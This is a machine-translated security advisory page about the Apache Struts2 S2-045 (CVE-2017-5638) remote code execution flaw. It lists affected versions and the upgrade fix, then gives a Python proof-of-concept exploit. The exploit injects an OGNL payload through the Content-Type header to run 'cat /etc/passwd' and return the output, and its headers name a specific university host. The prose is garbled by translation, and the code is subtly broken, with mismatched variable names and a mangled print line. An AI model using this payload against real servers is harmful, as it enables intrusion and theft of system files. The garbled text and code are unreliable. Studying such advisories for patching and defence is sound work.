Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net


! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com) FreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported. Apache Struts is a United States Apache(the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. Vulnerability number CVE-2017-5638 Vulnerability description The Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution. In fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it. The scope of the impact The Struts 2.3.5 – Struts 2.3.31 The Struts 2.5 – Struts 2.5.10 Solution If you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver. Vulnerability PoC #! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster. encode import multipart_encode from poster. streaminghttp import register_openers header1 ={ "Host":"alumnus. shu. edu. cn", "Connection":"keep-alive", "Refer":"alumnus. shu. edu. cn", "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "Accept-Encoding":"deflate", "Accept-Language":"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4", } def poc(): register_openers() datagen, headers = multipart_encode({"image1": open("tmp.txt", "rb")}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]="'%{(#nike,='multipart/form-data'). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess? (#_memberAccess=#dm): ((#container=#context['com. opensymphony. xwork2. ActionContext. container']). (#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). (#context. setMemberAccess(#dm)))). (#cmd='cat /etc/passwd'). (#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). (#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). (#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). (#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). getOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). (#ros. flush())}"' request = urllib2. Request(str(sys. argv[1]),datagen,headers=header) response = urllib2. urlopen(request) print the response. read() poc()